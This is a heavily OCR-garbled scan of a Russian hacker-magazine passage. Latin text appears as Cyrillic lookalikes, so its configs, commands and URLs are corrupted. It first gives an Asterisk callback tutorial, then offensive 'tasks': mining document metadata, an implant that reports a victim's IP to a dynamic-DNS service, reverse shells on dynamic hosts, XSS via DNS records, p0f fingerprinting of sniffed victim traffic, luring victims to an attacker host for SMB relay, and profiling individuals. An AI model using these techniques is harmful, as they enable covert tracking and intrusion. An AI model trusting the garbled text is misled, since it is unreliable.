мой городской номер 310309: 

[ іготдогосі] 

ехДеп => 310309 , 1 ,№эОр (гѵопуак з потега 
$ {САШЕКІБ ( аіі ) } ) 

ехДеп => 3 1 0 3 0 9 , п , ЫоОр ( $ { 8ТКЕТІМЕ ( $ { ЕРОСН } , , %сІ . %т . %У- 
%Н : %М : %8 ) }) 

ехДеп => 310309, п, СоТоІі ($ ["${ САЬЬЕКІБ ( питЬег ) } " = 

"8901234567"] ?іѵг, з,1) 

ехДеп => 310309 ,п,Апзмег ( ) ; Отвечаем 



Функция ІЧоОр позволяет вывести в консоль АзТегіз к текст или состояние 
переменной. Первая строка выводит в консоль Саііег Ю звонящего, а 
вторая — дату и время звонка. Для работы системы это не нужно, но при 
отладке очень полезно. Строка «ехТеп => 310309,п,6оТоШ$[ м ${САи_ЕПЮ( 
питЬег]}" = "8901 234567"]?іѵг р з, 1 ]» — это неполное ветвление, оно прове- 
ряет, с какого номера пришел вызов. Если с номера 8901234567, то вызов 
уходит в контекст ІѴР; если же номер другой, тогда обработка вызова 
пройдет по обычной схеме. Обрати внимание, что номер может приходить 
без 8 в начале. 

Если саІІЬаск-системой будет пользоваться пара человек, то прописать 
под каждый их номер еще одну строчку в конфиге не будет большой про- 
блемой. Но что, если их будет 50? Изящнее всего прописать всех пользо- 
вателей в специальной базе данных. Вместе с АзТегізк часто используют 
МуЗСИ, чтобы записывать в нее логи звонков — СОР. В результате на 




5ІМ-карта и 5ІМ йіаіег для нее 



сервере создается база АзТегізк, в которой есть таблица СОР. Мы в этой 
базе создадим еще одну таблицу — саІАЬаск. Для этого в консоли наби- 
раем «тузці -и азТегізк -р азТегізк», далее указываем пользователя, 
таблицу и запрос на ввод пароля. После ввода пароля создаем таблицу 
(телефон, РІЫ-код, переменная саІІЬаск, имя] и заполняем параметрами 
одного из пользователей: 

СКЕАТЕ ТАВЬЕ ' саІІЬаск' ( 

’рЬопе' ѵагсЬаг(80) ЫОТ ШЬЬ Ьеіаиік ' 

' ріп' іпР(11) ЮТ ШЬЬ Ьеіаиік '4321', 

'саІІЬаск' ігШ(11) ЮТ ШЬЬ Ьеіаиік '0', 

'изег' ѵагсЬаг (255) ЮТ ШЬЬ Ьеіаиік * * 

) ? 

Ш8ЕКТ ЮТО саІІЬаск (рЬопе, ріп, изег) 
ѵаіиез (' 8901234567 ' , '2602', ' Аддгеззог ' ) ; 

Итак, база с данными есть, как же АзТегізк узнает об этом? Все достаточ- 
но просто, нужно дополнить наш контекст [ІтотдогосІ]: 

ехкеп => 310309 , 1 ,1Х[оОр (гѵопуак з потега 
$ { САЕЬЕКІБ ( аі 1 ) } ) 

ехкеп => 3 1 0 3 0 9 , п , ДГоОр ( $ { ЗТКЕТШЕ ( $ { ЕРОСН } , , %Ь . %т . %У- 
%Н : %М: %8) }) 

ехРеп => 310309 ,п,МУ80Ь (Соппеск соппіЬ ІосаІЬозк 
азкегізк азкегізк азкегізк) 

ехкеп => 310309 ,п,МУ80Ь (Оиегу гезиІкіЬ ${соппіЬ} 
зеіеск ріп, саІІЬаск ігот саІІЬаск ѵ^Ьеге 
рЬопе=$ {САЬЬЕКІВ (питЬег) } ) 

ехкеп => 310309 ,п,МУ8С>Е (ЕексЬ іексЬісі ${гези1кісі} ріп 
саІІЬаск) 

ехкеп => 310309 ,п,ЬоОр (ріп -> ${ріп) саІІЬаск# -> 

$ {саІІЬаск}) 

ехкеп => 310309 ,п,МУ8С>Е (Сіеаг $ {гезиІкіЬ} ) 
ехкеп => 310309 ,п,МУ8С>Е (Бізсоппеск ${соппіЬ}) 
ехкеп => 310309 ,п,СоТоІі ($["$ {ріп} " != ""]?іѵг- 

разз ,з,1) 

ехкеп => 3103 09 ,п,Апзѵ^ег ( ) ; Отвечаем 

Каждая строчка, по сути, говорит сама за себя: сначала обращаемся к 
базе, далее с помощью 5СИ-запроса получаем параметры для номера 
звонящего абонента и обрабатываем их. Непонятной может показаться 
последняя строчка «СоТоІ1 : ($["${ріп}" != ""]?іѵг-ра55,5,1]». Если в результа- 
те запроса номер найдется в базе, то переменная ріп будет не пустой, и 
тогда дальше обработка вызова пойдет в контексте іѵг-разз. 

НАСТРАИВАЕМ ІѴР 

Итак, номер пользователя определяется и сверяется с базой данных. 

Что дальше? Необходимо проиграть ему инструкции, как ввести РІ N - 
код, чтобы произвести авторизацию пользователя, и обработать вход. 
Голосовые меню, которые взаимодействуют с пользователем, называются 
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Входящий звонок в СЫ с номера, 
которого нет в базе 




Входящий контекст 




История обработки вызова 
саіі-файла 



ІѴР. После того, как номер абонента определился, звонок перекидывает- 
ся на контекст іѵг- раз: 

[іѵг-разз] 

ехбеп => з , 1 , Васкдгоипсі (МеІсотеРазз ) ; 

ехбеп =>з , п ,Тл1аібЕхбеп ( 10 ) 

ехбеп => _ХХХХ,1, СоТоІб ( $ [ " $ {ЕХТЕШ} " = 

11 $ { ріп } " ] ? І ѴГ ,3,1) 
ехб еп = > _ХХХХ , п , Напдир 
ехбеп => С , 1 , Напдир 
ехбеп => і,1, Напдир 



Здесь мы воспроизводим ролик ѴѴе [со те Ра 55 (его необходимо пред- 
варительно скопировать в Д/аг/ІіЬ/азІегізк/зоипсІз/ги]. Потом ждем 
выбора пользователя 10 секунд. Если за это время никакой номер 
не введен, то кладем трубку: ех[еп => 1,1, Напдир. Если введен РІ N 
не больше четырех символов, опять же, кладем трубку: ех[еп => 
і , 1 , Напдир. Никто не мешает, к примеру, вместо Напдир прописать 
возможность еще пару раз ввести РІ N , и только после третьей неудач- 
ной попытки класть трубку. Так или иначе, если были введены четыре 
символа, которые совпадают с РІІЧ-кодом, то мы переходим в контекст 
іѵг. 



НАСТРАИВАЕМ 68М-ІШ1ЮЗ 



В качестве номера доступа удобно использовать не только 5ІР- 
номер, но и обычный федеральный сотовый. Чтобы подключить 
сотовый номер к Астериску, нужен ѴоІР-05М шлюз, для этого 
отлично подойдет 30 ІІ5В-модем НІІАѴѴЕІ Е1550, который актив- 
но продают операторы сотовой связи. 0 его использованием 
можно не только сделать традиционный саІІЬаск, но и реали- 
зовать обратный вызов через 5М5. Прежде чем подключить 
модем, нужно убедиться, что он поддерживает голос, это может 
определить прога М1СР0-В0Х НІЧАѴѴЕІ МООЕМ 0ЫЕО0КЕР. Она 
же снимет привязку к определенному оператору. 

Для нормальной работы нам потребуется ядро 2.6.32 и выше. 
Окачиваем и устанавливаем модуль для Азіегізк ( 

агсі і. который реализует работу с 30-модемом. 
Далее проверяем, появился ли сЬап_сІа[асагсІ.50 в /изг/ІіЬ/ 
азіегізк/тосіиіез. Появился? Хорошо. Руками копируем .Дгипк/ 
е[с/сІа[асагсІ.соп[ в /еіс/азіегізк. В этом конфиге по умолчанию 
прописаны два устройства [сІаІасагбО] и [баіасагсіі] — одно уда- 
ляем, оно нам не нужно. Меняем разъем, куда подключен шлюз, 
и контекст для него: 

[ЬабасагЬО ] 

аис!іо=/ сіеѵ/ ббуШЗВІ 

йаС а = / йе ѵ / ССу 113 В 2 

сопбехб=сіабасагс1-іпсотіпд 

дгоир=1 

гхдаіп=3 

бхдаіп=3 

Теперь сохраняет изменения, перезапускаем Астериск — он готов 
к работе. Можно прописать контекст и принимать/совершать звон- 
ки, а можно проверить баланс или отправить 5М5: 

СЬІхіабасагсІзтз ЬабасагсІО 89000000000 Неііо! 
СЬІхіабасагсіиззсі ЬабасагЬО *102# 

[ЬабасагсЮ ] Соб 10330 гезропзе: 'Баланс 155.49 р. 

Аня +Саша= любовь . Аутебя? Шли ИИмя+Имя на 5050 Зр 1 



[іѵг] 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 

ехбеп 



=>з,1, Зеб (іпиш=0) 

=>з,п,3еб (бпшп=0) 

=> з ,п, Васкдгоипб (Шеісоше) 

= >з , п,ШібЕхбеп ( 10 ) 

= > 1 , 1 , СоТо ( іѵг-оиб , з , 1 ) 

=> 2 , 1 ,СоТо (іѵг-сШ-ріп, з , 1) 

=> і , 1 , РІауЬаск (рЬх-іпѵаІіб) 

= > і ,п. Зек (іпиш=$ [ $ { іпигп} + 1]) 

= > і,п,СобоІі ($ [ " ${іпит} " < " 3 " ] ?з , 1) 
=> і,п, Напдир () 

=> б , 1 , Зек (бпит=$ [ $ {Спит} + 1]) 

=> б ,п, Собоіб ( $ [ " $ {бпит} " < " 3" ]?з,1) 
=> б, п, Напдир () 



Контекст іѵг начинается с обнуления двух переменных іпит и [пит 
— это количество неверных попыток ввода и количество прошедших 
таймаутов. При каждом неверном вводе воспроизводится стандарт- 
ный ролик рбх-іпѵаіісі, а переменная іпит увеличивается на 1. После 
трех ошибок кладется трубка, то же самое происходит и с переменной 
[пит. Далее воспроизводится ролик ѴѴеІсоте, за ним ожидаем ввод 
номера для звонка. В нашем меню две опции: 1 — позвонить и 2 — 
сменить РІЫ-КОД: 



[іѵг-оиб] 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 
ехбеп => 



з,1, Зеб (іпит=0) 
з,п,3еб (бпит=0) 
з , п , Васкдгоипб ( Ьеер ) 
з ,п,ШібЕхбеп ( 10 ) 

8 9ХХХХХХХХХ , 1 , Біаі ( 5ІР/Ыа1/$ {ЕХТЕЫ} 

8 9ХХХХХХХХХ , п , Напдир 

8495 ХХХХХХХ ,1,Біа1(ЗІР/Ыа2/${ЕХТЕШ} 

849 5ХХХХХХХ ,п, Напдир 

8 [ 2 - 8 ] ХХХХХХХХХ , 1 , Біаі ( ЗІР/ЫаЫаЗ /$ { ЕХТЕШ) 
8 [ 2 - 8 ] ХХХХХХХХХ , п , Напдир 
і , 1 , РІауЬаск (рЬх-іпѵаІіб) 
і ,п, Зеб ( іпит=$ [${ іпит) + 1]) 
і ,п, Собоіб ($["${ іпит) " < "3"]?з,1) 
і , п , Напдир ( ) 

б , 1 , Зеб (бпит=$ [ $ {бпит} + 1]) 
б ,п, Собоіб ($["$ {бпит} " < " 3 " ] ? з , 1 ) 



► 036 
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ехкеп => 1: , п , Напдир ( ) 

[іѵг-сЬ-ріп] 

ехкеп => з , 1 , Васкдгоипсі (Ьеер) 
ехкеп => 8,п ДаікЕхкеп ( 10) 

ехкеп => _ХХХХ, 1 , МУЗОЬ (Соппеск соппісі ІосаІЬозк 
азкегізк азкегізк азкегізк) 

ехкеп => _ХХХХ,п,МУ8()Ь (Оиегу гезиікісі ${соппісІ} 
ирЬаке саІІЬаск зек 'ріп' = $ {ЕХТЕЮ ѵ/Ьеге 
рЬопе=$ {САЬЕЕКІБ (питЬег ) }) 

ехкеп => _ХХХХ,п,МУ8С>Е (Бізсоппеск ${соппіс!}) 
ехк еп = > _ХХХХ , п , Напдир ( ) 
ехкеп => і ,1 , Напдир ( ) 
ехкеп => к ,1 , Напдир ( ) 

В контексте іѵг-оиі прописаны исходящие звонки. Вначале воспроиз- 
водится стандартный «бииип», после которого можно набирать номер 
для звонка. В конфиге у нас прописаны три направления: сотовые, 
Москва и межгород; каждое направление соединяется через опреде- 
ленный транк (аккаунт ѴоІР-провайдера): ЫаЫаІ, ЫаЫа2 или ЫаЫаЗ. 
Можно обойтись одним, но для каждого направления можно выбрать 
наиболее выгодного ѴоІР-оператора, этим мы и воспользовались. 

В контексте іѵг-сЬ-ріп, который отвечает за смену РІІЧ’а: сначала вос- 
производится «бииип», после чего дается 10 сек на ввод нового РІІЧ’а. 
Когда новый РІ N введен, происходит подключение к базе и обновле- 
ние РІКІ-кода в таблице. 

САН-ФАЙЛЫ В АЗТЕРІЗК Е 

Собственно, с этого момента система уже работает. Мы звоним на наш 
номер, авторизуемся с помощью РІІ\І-кода, далее вводим номер теле- 
фона, на который Азіегізк и перенаправляет наш звонок. Тестовый 
звонок... да, все работает! Однако в самом начале статьи мы говорили 
о том, что наша саІІЬаск-система должна сама перезванивать, чтобы 
мы не тратились на исходящие звонки с сотового. Как же это сделать? 
В Астериске есть так называемые саіі-файлы, которые позволяют ини- 
циировать вызов и соединять два номера. Создаем конфиг и запол- 
няем следующим: 

СЬаппеІ: 8ІР/ЫаЫа1/8901234567 

МахКекгіез : 2 

ЕекгуТіше: 3 

ШікТіте: 2 0 

Сопкехк : іѵг-разз 

Ехкепзіоп: з 

Ргіогіку: 2 

АгсЬіѵе : Уез 

Что за... и за что отвечает: 

СЬаппеІ — указывает тип, название транка и номер телефона; 
МахРеІгіез — параметр определяет количество попыток дозвона. Как 
только они будут исчерпаны, файл удалится; 

РеІгуТіте — время между повторениями; 

ѴѴаіСГіте — этот параметр указывает, сколько времени необходимо 
ждать поднятия трубки до того, как прекратить попытку дозвониться; 
Сопіех* — это контекст, выполнение которого начнется после поднятия 
трубки; 

Ехіепзіоп — это номер в контексте іѵг-разз, который будет набран, 
когда возьмут трубку (пишем тут з); 

Ргіогііу — это приоритет экстеншина з, с которого начнется обработка 
(укажем 2] 

АгсЬіѵе — если поставить Уез, тогда после выполнения саіі-файла в 
А/аг/зрооІ/азІегізк/оиІдоіпддІопе можно будет посмотреть историю 
обработки вызова. 

Если созданный файл переместить в Д/аг/зрооІ/азІегізк/оиІдоіпд/, то 
Астериск сразу начнет звонить на номер 8901234567 (причем рекомен- 



дуется саіі-файл именно перемещать, а не копировать]. Время каждой 
попытки дозвона — 20 секунд, после чего номер набирается заново, и 
так два раза. Если во время одной из попыток абонент возьмет трубку, 
то система попытается набрать экстеншен з в контексте саІІЬаск. 

НАСТРАИВАЕМ САИВАСК 

Добавить гибкости, подставляя нужный номер, можно при помощи 
АО I (АзІегізкСаІеѵѵауІпІегІасе), интерфейса взаимодействия с внеш- 
ними скриптами. Внешний скрипт можно написать на Регі, РНР, С, 
ВазЬ. Предлагаю написать нужный нам скрипт на ВазЬ — это проще и 
быстрее всего, выглядеть он будет так: 

# ! /Ьіп/ЬазЬ 

ескю СЬаппеІ: 8ІР/ЫаЫа1/$1 > /кшр/$2 
есЬоМахКекгіез : 2 » /ктр/$2 
есЬоКекгуТіте : 3 » /ктр/$2 
есЬоЭДаікТіте : 20 » /ктр/$2 
ескю Сопкехк: іѵг-разз » /ктр/$2 
ескю Ехкепзіоп: з » /ктр/$2 

ескю Ргіогіку: 2 » /ктр/$2 

ескю АгсЬіѵе: Уез » /ктр/$2 
тѵ /ктр/$2 /ѵаг/зрооі/азкегізк/оикдоіпд 

Готовый файл называем саІІЬаск. аді и перемещаем в /ѵаг/ІіЬ/азТегізк/ 
аді-Ьіп. При вызове скрипта из контекста в Астериске ему будут пере- 
даны две переменных: номер телефона ($1 в скрипте), на который 
будем перезванивать, и имя саіі-файла ($2 в скрипте). 

Когда мы создавали таблицу саІІЬаск, то сделали в ней поле саІІЬаск, 
которое по умолчанию равно 0. При входящих звонках мы получаем 
значение этого поля вмести с РІЫ-кодом. Если состояние этого поля 
не равно 0, то будем перезванивать. Отредактируем контекст іѵг-разз и 
создадим новый саІІЬаск: 

[іѵг-разз] 

ехкеп => з Д, СоТоІк ( $ [ " $ {саІІЬаск} " ! = 

" 0 " ] ?са11Ьаск, з , 1) 

ехкеп => з , п, ВаскдгоипЬ (МеІсотеРазз ) ; 

ехкеп =>з ,п,ШаікЕхкеп (10) 

ехкеп => _ХХХХ,1, СоТоІк ($["${ ЕХТЕЕ } " = 

" $ { ріп } "] ?ІѴГ, 3,1) 
ехкеп = > _ХХХХ , п , Напдир 
ехкеп => к, 1, Напдир 
ехкеп => і , 1 , Напдир 

[саІІЬаск] 

ехкеп => з , 1 , АСІ (саІІЬаск. аді ,$ {саІІЬаск} ,$ {ШІОІІЕІВ} ) 
ехкеп =>з,п,Ьапдир 

Первая строка в [саІІЬаск] запускает скрипт под названием саІІЬаск. 
аді и передает две переменных: номер и Ь N ЮЦІ ЕЮ в качестве назва- 
ния для саіі-файла. Таким образом и происходит обратный вызов. 

ПЛЮСЫ И МИНУСЫ 

Результат всех этих действий — полноценная саІІЬаск-система. Ее 
плюсы очевидны: можно реально экономить при звонках, особенно 
за пределы своего города или в роуминге. Из минусов — при звонке 
будет теряться твой СаІІегЮ, у абонента вместо этого будет высвечи- 
ваться номер ѴоІР-оператора. Как вариант, можно найти такого ѴоІР- 
прова, который позволяет подставить свой (или даже произвольный] 
СаІІегЮ. Еще один минус системы — увеличенное время соедине- 
ния. У меня при звонке через зіт-сііаіег от момента вызова номера 
в контакт листе до «гудков» на набранный номер уходит примерно 
20-25 секунд. Но я готов ждать :). В ближайших планах — прикрутить 
к системе биллинг и реализовать заказ звонка через сайт, продавая 
саІІЬаск как услугу. :Ь-с 
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ЗАДАЧА: ПРОСМОТР МЕТАДАННЫХ 
В ОФИСНЫХ ДОКУМЕНТАХ 

РЕШЕНИЕ: 



Ни для кого не секрет, что документы из офиса (и не только] 
содержат в себе метаданные. В них присутствует разнообразная 
инфа, вроде даже нужная и полезная в определенных ситуациях. 
Но с точки зрения безопасности там может сохраниться и конфи- 
денциальная информация. В общем-то, стоит вспомнить кучку 
скандалов, особенно за границей. Утечка там, утечка здесь... 

Все утекает куда-то. Но мы-то смотрим с другой стороны, и к нам 
притекает :). Итак, примерный список, чего мы можем добыть из 
метаданных: 



имя пользователя, создавшего и последнего редактировав- 
шего файл; 

название организации; 

почта пользователя; 

имя компьютера; 

все пути хранения файлов; 

имена принтеров в системе; 

версия офиса и ОС; 

комментарии, скрытый и удаленный текст; 
и еще всякая бурда : ) . 

О важности такой инфы даже говорить не стоит, особенно если наша 
цель — корпоративная сетка, и есть доступ к файл-серверу с общими 
доками. Абывает, что доки и в веб выкладывают. Пробежался по ним — и 
уже собрал пачку инфы. Главное, что все действия легальны (в смыс- 
ле, мы просто смотрим файлики, ничего при этом не ломая). В России 
метаданными редко кто пользуется, но умный офис «самое важное» со- 
храняет за них. Вообще, заграничная практика — все доки выкладывать 
в рбГках.таккакпри конвертации удаляется большая часть метаданных. 
Но и с рбГками втом же стиле какие-то скандалы были. 
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Метаданные в каком-то бое-файле: версия ОС и офиса, 
имена пользователей. 



Но вернемся кделу. Большую часть метаданных можно почистить/пос- 
мотреть прям в Офисе или в Винде в свойствах файла: 
Шр://5цррогГтісго50І : Гсопп/кЬ/825576/ — описалово, какая инфа 
хранится, и как ее почистить ручками. Также Майкрософт выпус- 
тила тулзы для чистки, плюс есть еще куча аналогов от сторонних 
разработчиков. 

Просмотреть всю инфу можно ручками, форматофисовских документов 
доступен, да и просмотрщики есть [ зппагІрсІооІБ.сопп/теІабаІа ). Инте- 
ресный момент: олдскульная тулза по извлечению метаданных ( іагазсо. 
огд/зесигбѵ/геѵегзіпд оІе/іпбех.ЫтП умеет доставать версию ОС, на 
которой был создан файл. Там же есть описание, где она это берет (жаль, 
на испанском). Другиетулзы этого неумеют, да и вообще ни у кого об этом 
ни слова (смотри ссылку выше на сайт МС). 



ЗАДАЧА: ПРИВЯЗАТЬ ДИНАМИЧЕСКИЙ 
ІР КОЫБ 

РЕШЕНИЕ: 

Иметь доступ ксвоему домашнему компу— этой приятно, и полезно. Воттолько боль- 
шинство провайдеров внешний айпишниквыделяюттолько за денежку. Решается 
сия проблема, используятакназываемыеОупатісВІМЗ. Фишка та кихОИЗвустанов- 
ке маленького времени на устаревание записей — около пары-тройки минут, потому 
другие БИЗ не помещаютих в свой кэш. Я было хотел написать, каконо делается, но 
нашел две отличные статьи, в которых все конкретно описано. В первой — все этапы 
настройки с привязкой кбесплатным сервисам [типа. ѵѵѵѵѵѵ.по-ір.сопп . Ітеебпз. 
абгаісі.огд и ѵѵѵѵѵѵ.бѵпбпз.сот) — ЬаЬгаЬаЬг.ги/Ыодз/ѵѵеЬбеѵ/1 01336 . Вторая 




о поднятии своего динамического йІМЗ (кстати, ничего трудного) — ЬаЬгабаЬг.ги/ 
Діпих/1 0 1 380. На самом деле, есть много сфер, гдетребуются возможности по 
привязке. Например, реверсовые шеллы можно привязывать не к статическим ІР, а 
кименам (геѵегзе_іср_бпз, геѵегзеДіМрз в М5Р]. Или прошлыхжертв с динамичес- 
кими ІР находить. Повесишьжертве«сервачок», который при выходе в сеть будет 
отправлять на бесплатный сервис НТТР-запрос вида: 

СЕТ /піс/ирбабе?]тозЦпате=имя_жертвы&туір=ее_ір НТТР/1.0 
НозР: бугшрбабе . по-ір . сот 

АиЦЬогігаДіоп : Вазіс логин_и_пасс_в_Ьазеб4 
бзег-АдепЦ: ЫаЬ-ЫаЬ-ЫаА ѵ. О . Іа 

И всегда можешь, не палясь, найти ее по имени — приятно :]. 
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ЗАДАЧА: 3 АП ИХНУТЬ Я ВАСКРИ ПТ 
В 0Ы5-ЗАПИСИ 



РЕШЕНИЕ: 

В майском номере ][ я рассказывал про организацию туннеля через 
О N5- прото кол (если точнее — о шеллкоде). Осуществлялось это че- 
рез набор тулз — пЬЕооІ от Воп’а Воѵѵез [ зкиіігеси гі1:у. огд/ѵѵікі/іпсіех 
рЬр/ЫЫооІ ). Не та к давно он запостил безумнейшее изыскание в 
своем блоге [ эки И5есигМ:у.огд/Ыод/?р=433 ) о встраивании ява- 
скриптов в 0І\І5-записи и для этого написал прогу- бпзхзз (входит в 
пЫюоІ). 

Идея втом, что, имея свой 0І\І5, мы с помощью бпзхзз можем 
подделывать 0145-ответы и встраивать в них яваскрипт код. Зачем 
оно надо? Рон привел простенький пример, реализовав Х55 для 
нескольких публичных се рви со в с 0І\І5-Іоокир’ом. Проблема в том, 



что сервисы выводят ответы отРЫЗ-серверовбез фильтрации ! То 
есть человек, который через браузер просмотрит инфу об имени 
нашего сервера, получит наш я ва -скрипт. Казалось бы, ничего 
чрезвычайного, но! Во-первых, пример Х55 — это только «наметка», 
так как сам подход оригинален (совмещение таких разных вещей] и 
жаждет дальнейших исследований, а, во-вторых, целью могут быть, 
например, веб-админки, в которых частенько бывают всевозможные 
резолверы, или логи с автоматическим резолвом имен, в которые 
можно подпихнуть свой код... Просторы для полета фантазии и 
новый вектор атаки :]. 

Кстати, сейчас есть одна проблема. В большинстве 0І\І5-записей 
нельзя использовать пробелы, а для НТМІ_, они, в общем, требуют- 
ся. Рон, как решение, использовал символ «/» вместо них, и РР 
нормально воспринимал НТМІ_, но не ІЕ (мотаем на ус :]. Так что если 
есть мысли — поделись с автором тулзы. К то му же, можно поучаст- 
вовать в бета-тестировании новой версии набора пЫюоІ — 0.05. 




ЗАДАЧА: УДАЛЕННО ОПРЕДЕЛИТЬ ВЕР- 
СИЮ ОС ПОФИНГЕРПРИНТУ СТЕКА ТСР/ 
ІР. ПАССИВНЫЙ МЕТОД 



РЕШЕНИЕ: 

Вернемся к классике. Для проведения любой более-менее осмыс- 
ленной атаки нам чаще всего требуется определить ОС, под которой 
сидит наша жертва. Сделать это можно разными путями: и из банне- 
ров всевозможных сервисов, и по набору открытых портов, и исполь- 
зуя СИ :]. Но есть злобный метод — на основе анализа протоколов 
стека ТСР/ІР. Протокол ІР и ТСР(есть методы и с ІСМР, и с СОР) четко 
расписан в ВЕС: взаимодействие, заголовки, поля. Четко, то есть 
для нормального взаимодействия различных систем хватает, да не 
совсем. Есть много тонкостей в реализации — какие использовать 
изначальные значения для пол ей? Как менять их по ходу соедине- 
ния? Как отвечать на нестандартные запросы? И в каждой конторе, 
производящей ОС, на них нашли различные ответы. Что еще лучше 
— разница чувствуется в поколениях ОС. 

Первые крупные работы по этой теме появились еще в 1999-2000 
годах (когда-то этим и мы занимались... эх, детство-детство :]], так 
что тема уже хорошо прожевана и много всего интересного можно 
быстро прогуглить ( птар.огд/Ьоок/о5СІеІ:есЕЫ:пп[ ). Но это не отри- 
цает ее важности и теперь. 

ОС-фи нгерпринтин г делится, как обычно, на активный и пассивный. 
Пассивный занимается тем, что анализирует поля ТСР/ІР- прото- 
кол о в начальные значения, алгоритм их изменения, в активном к 
этому добавляется отправка жертве всевозможных нестандартных 
пакетов и просмотр реакции на них. Пассивный, получается, менее 
точен, но зато мы не отправляем никаких данных нашей жертве, то 
есть нас обнаружить невозможно. Что не очень удобно — нам надо, 
чтобы жертва либо сама коннектилась к нам, либо как-то прослу- 
шивать ее трафик. У пассивного метода есть еще один «бонус», 
эффективность его с годами особо не ухудшилась — разные произ- 
водители как имели свои решения всехтонкостей стека, так и имеют, 
что нельзя сказать об активном, ведь теперь, например, очень часто 
производится нормализация пакетов на файрволах. 

Одним из лучших пассивных ОС-фингерпринтеров является рОЕ 
Скачать и почитать доки о нем можно тут — ІсатІшЕсогесІиппр.сх . К 
тому же, он входит в ВаскТгаск 4. Версии есть под все основные ОС. 
Жаль, что официальная разработка остановилась в 2006 году. Но по 
инету еще раскидано несколько «доделок». 

Прога может использовать один из четырех методов: 
по пакетам с выставленным 5ѴІ\І (по умолчанию] и 5ѴІЧ-АСК; 
анализ пакетов на установку соединения; 
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Детектим ОС через ЕіЧегсарІЧС 



П5Т— сброс соединения (когда портзакрыт, например); 

АС К — в передаче данных (совсем экспериментальный]. 

Для каждого из методов своя сигнатурная база. Кроме детекта 
ОС прога умеет выявлять І\ІАТ, файерволы, настройки сети. 

Что еще хорошо — она умеет работать срсар-файлами.Так что 
можно, наснифав у жертвы трафика, поковырять его в «домашних 
условиях». 

Вообще, обычная практика, когда рОЕ вешают на шлюз и таким 
образом получают инфу обо всей подсети. А для ускорения сбора 
можно добавить «активности», и, например, п рос ка нить сеть с 
поддельного ІР’шника. Палево небольшое, если правильно все 
организовать. 

Например, запуск рОЕ на прослушку интерфейса (-і] еЕЬО с выводом 
полученных сигнатур (-5] и сохранением в файл (-о): 

рОЕ -і еЕЬО -3 -о оз . ЕхЕ 

Или скормим ему рсар-файл и установим детект по П5Т-пакетам: 
рОЕ -К -з ЕезЕ_озсіеЕесЕ . рсар 
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г о о 1 і^Ь і : #рОт -Я. - б Ие$1:_оесІйІесІ: . рсар 

рО^ - раз^іѵе 05 Ііпдегргіпйпд иіііііу, ѵегзіоп 2.0*8 

[С) И. 2а1е«5кі <1еатШ+@Щопе . со, V/. б+еагпд. <ѵ^*еагп5(рроЬох . сот> 

рОі : Ііеіепіпд [РЗТ+) оп * іеБЩозгіеіесі.рсар' , 46 аідв (3 депегіс, скейт 1АЕ3081 

Р) , гиіе: 1 аіі ' . 

192.168.0. 101:4208 - РгеѳВ50 4.8 (сІгорреН, Іате) 

-> 39.159.-. і:443 Щізіапсе 32, Ііпк: ипзресНизЩ 

192.163.0. 101:4208 - ІЛЧКШгіМ [0:32:0:40: . : С}А: ? : ? 3 Ыгорресі 2) 

-> 89. 159 .12" '-':443 [Ііпк: ипересі-ріеЩ 

66.135. 233: 80 - Ьіпих гесепі 2,4 ЩгорреЩ 

-> 192.168.0.101:4207 Щізѣапсе 14, Ііпк: ипзресНіеЩ 
192,163*0,101: 4209 - РгееВБО 4*8 (сігорресі, Іэте) 

> 62.109. 33:443 Щізіапсе 32, Ііпк: ипэресіПесЦ 

62.109*1 і:443 - ГгееВЗР 4.8 (сГгорресі) 



Определяем ОС по ВЗТ-пакетам из рсар-файла 



Также можно выставлять интерфейс на прослушку (рготізсиоиз 
тосіе] параметром «-р» и устанавливать фильтр на пакеты, исполь- 
зуя регулярные выражения Ісрсіитр’а, а остальные опции смотри в 
хелпе. 

Какуже говорилось ранее, рСТуже официально не развивается, и, 
что хуже, не обновляются базы сигнатур. Можно, конечно, заморо- 
чится и сделать свою, либо порыскать в Сети — там есть. Но есть еще 
одно решение. Возможности рОГа встроены в ЕіТегсар [ еНегсар. 
гоигсеЬгде.пеі ]. А последний, как известно, живет и развивается. 
Вот и базы его имеют около 1 200 сигнатур, посравнениюс200у рОП 
Запустить ОС детект в ЕКегсар можно так (в ОТК, сигзез-интерфейсе): 



1) ЗпіНН — Шііііесі зпі^^іпд 

2) ЗДагД — ЗДагД зпіДДіпд 

3) Ѵіеѵ^ - РгоДіІез 

Кстати, исследования ОС детекта не остановились, и появляется 
что-то новое. Например, 

0са.и1 : гп.Ьг/~]оаоппебеіго5/д5ос/2009/ргоро5а[/побе1 .Ы:пг —забавно- 
показательная работа 2009 года про фингерпринт на основе анализа 
ТОР ІБЫ множества пакетов (развитие идеи, заложенной в рОЯ. Автор 
обещал реализовать идею в ІЧтар. 



№5 



РЕШЕНИЕ 



ЗАДАЧА: СОБРАТЬ ИНФОРМАЦИЮ 
О ЧЕЛОВЕКЕ 



Ни для кого не секрет, что в интернете можно найти кучу информации о 
человеке/организации даже по небольшой зацепке, ведь если что-то по- 
пало в Сеть, то останется там навсегда. И это не говоря отаких вещах, как 
социальные сети, где мы сами публикуем свою подноготную. Существуют 
правила по соблюдению конфиденциальности, но и они не особо спасают. 




ЗАДАЧА: СКРЫТНО ЗАСТАВИТЬ ЖЕРТ- 
ВУ ПОДКЛЮЧИТЬСЯ КОПРЕДЕЛЕННО- 
МУ ХОСТУ 



РЕШЕНИЕ: 

В майском номере я писал о 5М В геіау- атаках. Одним из важных мест в них 
была необходимость втом, чтобы жертва подсоединилась кнашему зло- 
серверу, на котором мы уже и выполняли бы все необходимые действия с 
хешиками пользователей. 

Кроме атак по 5МВ можно организовать общий «сбор информации» через 
тотже рОі'или слежку за юзером. Заострим внимание на этом — какзаста- 
вить их подключиться? 

Оченьудобно для таких вещей пользоваться стандартными возмож- 
ностями ѴѴіпбоѵѵз, хотя это требует доступ кобщему ресурсу в сети или к 
ко м п ьюте ру же ртв ы . 



А все, что для этого требуется — парочка поисковиков и публичные серви- 
сы, типа ѵѵЬоіз, сіпзіоокир ит.д. 

Безумнейший пример показан в статье аиаскѵесіогога/іпѵазіоп-оК 
ргіѵасѵ . Причем на живом человеке. От ІР-адреса до фото всей семьи, 
кредитной истории и номера страховки. И это без социальной инжене- 
рии. Офигеть :]. 

